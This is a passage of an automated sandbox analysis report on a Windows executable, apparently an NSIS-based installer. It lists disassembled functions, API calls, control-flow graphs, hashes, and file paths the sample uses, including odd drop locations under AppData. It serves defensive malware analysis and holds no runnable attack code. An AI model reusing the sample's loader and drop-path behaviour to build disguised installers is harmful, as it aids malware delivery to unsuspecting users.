                                                  • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-971695124
                                                  • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                  • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                  • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                  • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                  Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 440 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 443 402f11-402f16 440->443 444 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 440->444 445 4030f3-4030f7 443->445 452 403036-403044 call 402e5d 444->452 453 402f4f 444->453 459 403046-403049 452->459 460 403099-40309e 452->460 455 402f54-402f6b 453->455 457 402f6d 455->457 458 402f6f-402f78 call 403315 455->458 457->458 467 4030a0-4030a8 call 402e5d 458->467 468 402f7e-402f85 458->468 462 40304b-403063 call 40332b call 403315 459->462 463 40306d-403097 GlobalAlloc call 40332b call 4030fa 459->463 460->445 462->460 491 403065-40306b 462->491 463->460 489 4030aa-4030bb 463->489 467->460 469 403001-403005 468->469 470 402f87-402f9b call 405d2f 468->470 477 403007-40300e call 402e5d 469->477 478 40300f-403015 469->478 470->478 487 402f9d-402fa4 470->487 477->478 480 403024-40302e 478->480 481 403017-403021 call 40674f 478->481 480->455 488 403034 480->488 481->480 487->478 493 402fa6-402fad 487->493 488->452 494 4030c3-4030c8 489->494 495 4030bd 489->495 491->460 491->463 493->478 496 402faf-402fb6 493->496 497 4030c9-4030cf 494->497 495->494 496->478 498 402fb8-402fbf 496->498 497->497 499 4030d1-4030ec SetFilePointer call 405d2f 497->499 498->478 500 402fc1-402fe1 498->500 503 4030f1 499->503 500->460 502 402fe7-402feb 500->502 504 402ff3-402ffb 502->504 505 402fed-402ff1 502->505 503->445 504->478 506 402ffd-402fff 504->506 505->488 505->504 506->478
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402ED2
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3507071243740008011.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                    • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                    • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 4283519449-3274353692
                                                  • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                  • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                  • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                  • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                  Function 004062A4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 507 4062a4-4062af 508 4062b1-4062c0 507->508 509 4062c2-4062d8 507->509 508->509 510 4064f0-4064f6 509->510 511 4062de-4062eb 509->511 512 4064fc-406507 510->512 513 4062fd-40630a 510->513 511->510 514 4062f1-4062f8 511->514 515 406512-406513 512->515 516 406509-40650d call 406282 512->516 513->512 517 406310-40631c 513->517 514->510 516->515 518 406322-406360 517->518 519 4064dd 517->519 521 406480-406484 518->521 522 406366-406371 518->522 523 4064eb-4064ee 519->523 524 4064df-4064e9 519->524 527 406486-40648c 521->527 528 4064b7-4064bb 521->528 525 406373-406378 522->525 526 40638a 522->526 523->510 524->510 525->526 529 40637a-40637d 525->529 532 406391-406398 526->532 530 40649c-4064a8 call 406282 527->530 531 40648e-40649a call 4061c9 527->531 533 4064ca-4064db lstrlenW 528->533 534 4064bd-4064c5 call 4062a4 528->534 529->526 535 40637f-406382 529->535 545 4064ad-4064b3 530->545 531->545 537 40639a-40639c 532->537 538 40639d-40639f 532->538 533->510 534->533 535->526 541 406384-406388 535->541 537->538 543 4063a1-4063bf call 406150 538->543 544 4063da-4063dd 538->544 541->532 553 4063c4-4063c8 543->553 546 4063ed-4063f0 544->546 547 4063df-4063eb GetSystemDirectoryW 544->547 545->533 549 4064b5 545->549 551 4063f2-406400 GetWindowsDirectoryW 546->551 552 40645b-40645d 546->552 550 40645f-406463 547->550 554 406478-40647e call 406516 549->554 550->554 559 406465 550->559 551->552 552->550 556 406402-40640c 552->556 557 406468-40646b 553->557 558 4063ce-4063d5 call 4062a4 553->558 554->533 562 406426-40643c SHGetSpecialFolderLocation 556->562 563 40640e-406411 556->563 557->554 560 40646d-406473 lstrcatW 557->560 558->550 559->557 560->554 566 406457 562->566 567 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 562->567 563->562 565 406413-40641a 563->565 569 406422-406424 565->569 566->552 567->550 567->566 569->550 569->562
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                  • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                  • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                  • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                  • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-1230650788
                                                  • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                  • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                  • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                  • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                  Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 634 40176f-401794 call 402c37 call 405bca 639 401796-40179c call 406282 634->639 640 40179e-4017b0 call 406282 call 405b53 lstrcatW 634->640 645 4017b5-4017b6 call 406516 639->645 640->645 649 4017bb-4017bf 645->649 650 4017c1-4017cb call 4065c5 649->650 651 4017f2-4017f5 649->651 658 4017dd-4017ef 650->658 659 4017cd-4017db CompareFileTime 650->659 653 4017f7-4017f8 call 405d4f 651->653 654 4017fd-401819 call 405d74 651->654 653->654 661 40181b-40181e 654->661 662 40188d-4018b6 call 4052e6 call 4030fa 654->662 658->651 659->658 663 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 661->663 664 40186f-401879 call 4052e6 661->664 676 4018b8-4018bc 662->676 677 4018be-4018ca SetFileTime 662->677 663->649 697 401864-401865 663->697 674 401882-401888 664->674 678 402ac8 674->678 676->677 680 4018d0-4018db CloseHandle 676->680 677->680 682 402aca-402ace 678->682 683 4018e1-4018e4 680->683 684 402abf-402ac2 680->684 686 4018e6-4018f7 call 4062a4 lstrcatW 683->686 687 4018f9-4018fc call 4062a4 683->687 684->678 691 401901-4022f6 call 4058e4 686->691 687->691 691->682 697->674 699 401867-401868 697->699 699->664
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                    • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                    • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp$C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$Call
                                                  • API String ID: 1941528284-3220870226
                                                  • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                  • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                  • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                  • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                  Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 700 4030fa-403111 701 403113 700->701 702 40311a-403123 700->702 701->702 703 403125 702->703 704 40312c-403131 702->704 703->704 705 403141-40314e call 403315 704->705 706 403133-40313c call 40332b 704->706 710 403303 705->710 711 403154-403158 705->711 706->705 712 403305-403306 710->712 713 4032ae-4032b0 711->713 714 40315e-4031a7 GetTickCount 711->714 717 40330e-403312 712->717 715 4032f0-4032f3 713->715 716 4032b2-4032b5 713->716 718 40330b 714->718 719 4031ad-4031b5 714->719 720 4032f5 715->720 721 4032f8-403301 call 403315 715->721 716->718 722 4032b7 716->722 718->717 723 4031b7 719->723 724 4031ba-4031c8 call 403315 719->724 720->721 721->710 734 403308 721->734 727 4032ba-4032c0 722->727 723->724 724->710 733 4031ce-4031d7 724->733 730 4032c2 727->730 731 4032c4-4032d2 call 403315 727->731 730->731 731->710 737 4032d4-4032e0 call 405e26 731->737 736 4031dd-4031fd call 4067bd 733->736 734->718 742 403203-403216 GetTickCount 736->742 743 4032a6-4032a8 736->743 744 4032e2-4032ec 737->744 745 4032aa-4032ac 737->745 746 403261-403263 742->746 747 403218-403220 742->747 743->712 744->727 748 4032ee 744->748 745->712 751 403265-403269 746->751 752 40329a-40329e 746->752 749 403222-403226 747->749 750 403228-40325e MulDiv wsprintfW call 4052e6 747->750 748->718 749->746 749->750 750->746 755 403280-40328b 751->755 756 40326b-403272 call 405e26 751->756 752->719 753 4032a4 752->753 753->718 758 40328e-403292 755->758 760 403277-403279 756->760 758->736 761 403298 758->761 760->745 762 40327b-40327e 760->762 761->718 762->758
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$@
                                                  • API String ID: 551687249-3859443358
                                                  • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                  • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                  • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                  • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                  Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 763 402644-40265d call 402c15 766 402663-40266a 763->766 767 402abf-402ac2 763->767 768 40266c 766->768 769 40266f-402672 766->769 770 402ac8-402ace 767->770 768->769 771 4027d6-4027de 769->771 772 402678-402687 call 4061e2 769->772 771->767 772->771 776 40268d 772->776 777 402693-402697 776->777 778 40272c-40272f 777->778 779 40269d-4026b8 ReadFile 777->779 780 402731-402734 778->780 781 402747-402757 call 405df7 778->781 779->771 782 4026be-4026c3 779->782 780->781 783 402736-402741 call 405e55 780->783 781->771 791 402759 781->791 782->771 785 4026c9-4026d7 782->785 783->771 783->781 788 402792-40279e call 4061c9 785->788 789 4026dd-4026ef MultiByteToWideChar 785->789 788->770 789->791 792 4026f1-4026f4 789->792 795 40275c-40275f 791->795 796 4026f6-402701 792->796 795->788 797 402761-402766 795->797 796->795 798 402703-402728 SetFilePointer MultiByteToWideChar 796->798 799 4027a3-4027a7 797->799 800 402768-40276d 797->800 798->796 801 40272a 798->801 802 4027c4-4027d0 SetFilePointer 799->802 803 4027a9-4027ad 799->803 800->799 804 40276f-402782 800->804 801->791 802->771 805 4027b5-4027c2 803->805 806 4027af-4027b3 803->806 804->771 807 402784-40278a 804->807 805->771 806->802 806->805 807->777 808 402790 807->808 808->771
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                    • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                  • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                  • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                  • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                  Function 004065EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 809 4065ec-40660c GetSystemDirectoryW 810 406610-406612 809->810 811 40660e 809->811 812 406623-406625 810->812 813 406614-40661d 810->813 811->810 815 406626-406659 wsprintfW LoadLibraryExW 812->815 813->812 814 40661f-406621 813->814 814->815
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                  • wsprintfW.USER32 ref: 0040663E
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                  • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                  • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                  Function 004057B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 816 4057b5-405800 CreateDirectoryW 817 405802-405804 816->817 818 405806-405813 GetLastError 816->818 819 40582d-40582f 817->819 818->819 820 405815-405829 SetFileSecurityW 818->820 820->817 821 40582b GetLastError 820->821 821->819
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                  • GetLastError.KERNEL32 ref: 0040580C
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                  • GetLastError.KERNEL32 ref: 0040582B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 3449924974-224404859
                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                  • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                  • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                  Function 00405DA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 822 405da3-405daf 823 405db0-405de4 GetTickCount GetTempFileNameW 822->823 824 405df3-405df5 823->824 825 405de6-405de8 823->825 827 405ded-405df0 824->827 825->823 826 405dea 825->826 826->827
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405DC1
